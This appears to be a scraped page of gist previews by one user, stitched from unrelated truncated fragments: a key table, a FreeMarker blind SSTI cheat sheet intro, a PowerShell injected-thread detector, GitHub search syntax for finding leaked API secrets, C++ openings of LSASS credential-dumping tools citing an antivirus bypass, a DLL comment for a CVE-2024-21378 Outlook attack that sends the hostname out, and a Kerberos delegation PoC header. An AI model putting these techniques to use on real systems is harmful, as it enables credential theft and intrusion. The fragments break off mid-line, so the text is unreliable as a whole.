yeshuibo

import sys

# The a and b values for each index in the block.
keys = {0: (54, 147), 1: (96, 129), 2: (59, 193), 4: (45, 130), 5: (96, 144), 6: (27, 129), 8: (44, 180), 9: (118, 141), 10: (115, 129), 12: (13, 164), 13: (27, 133), 14: (20, 192), 16: (28, 166), 17: (17, 133), 18: (19, 193), 20: (20, 161), 22: (14, 193), 23: (12, 132), 24: (18, 161), 25: (17, 140), 26: (29, 192), 28: (115, 178), 29: (28, 132), 31: (12, 132), 32: (31, 165), 33: (20, 136), 34: (27, 193), 36: (96, 164), 37: (18, 133), 39: (23, 132), 40: (13, 165), 41: (13, 148), 42: (23, 193), 43: (19, 132), 44: (27, 178), 45: (83, 137), 48: (18, 166), 49: (96, 148), 50: (13, 193), 52: (96, 166), 53: (20, 129), 54: (20, 193), 55: (27, 132), 56: (9, 160), 57: (96, 148), 58: (13, 192), 60: (96, 180), 62: (31, 193), 64: (7, 166), 66: (20, 192), 67: (27, 132), 68: (28, 160), 69: (17, 149), 70: (19, 193), 71: (96, 132), 72: (76, 164), 74: (80, 192), 75: (78, 132), 76: (96, 160), 77: (27, 144), 78: (24, 193), 80: (96, 178), 81: (17, 141), 82: (12, 193), 8

yeshuibo

What is this cheat sheet ?

I recently stumbled on a blind SSTI injection on a bug bounty program (no output nor stack trace, only 500 status code on invalid syntax)

The version was up to date and it was not possible to RCE because the conf was following best practices and there is no public sandbox bypass on the latest version. So was it possible to do stuff anyway ? Yes I found some nice gadgets to enumerate all accessible variables from the engine, read data blindly or perform some DoS.

This is not meant to be complete, you will find classic payloads for freemarker on other cheat sheets this is only the new stuff from my research which is not public anywhere else

get versions

yeshuibo

function Get-InjectedThread
{
    <# 
    
    .SYNOPSIS 
    
    Looks for threads that were created as a result of code injection.
    
    .DESCRIPTION
    

yeshuibo

/**
 * Description:
 *   You can decode the hidden message by running the program.
 *   Compile and execute: user@host:~$ javac A.java && java A
 * 
 * @author Bipin Jitiya
 * @since 2024-12-17
 */
class A {
    public static void main(String[] args){

yeshuibo

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

yeshuibo

#include <Windows.h>
#include <iostream>
#include <DbgHelp.h>
#include <processsnapshot.h>
#include <TlHelp32.h>
#include <processthreadsapi.h>

//process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp
//minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
//compile using: cl.exe refl.cpp /DUNICODE

yeshuibo

#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>

DWORD GetLsassPid() {

	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);

yeshuibo

Index

• #prepreqs
• #roadmap

---

preprequisites

yeshuibo

/**
 *    This DLL is designed for use in conjunction with the Ruler tool for
 *    security testing related to the CVE-2024-21378 vulnerability, 
 *    specifically targeting MS Outlook.
 * 
 *    It can be used with the following command line syntax:
 *      ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 *    Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 *    After being loaded into MS Outlook, it sends the PC's hostname and

yeshuibo

#!/usr/bin/env python

# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a *very* rough PoC

import SimpleHTTPServer
import SocketServer
import base64
import random
import struct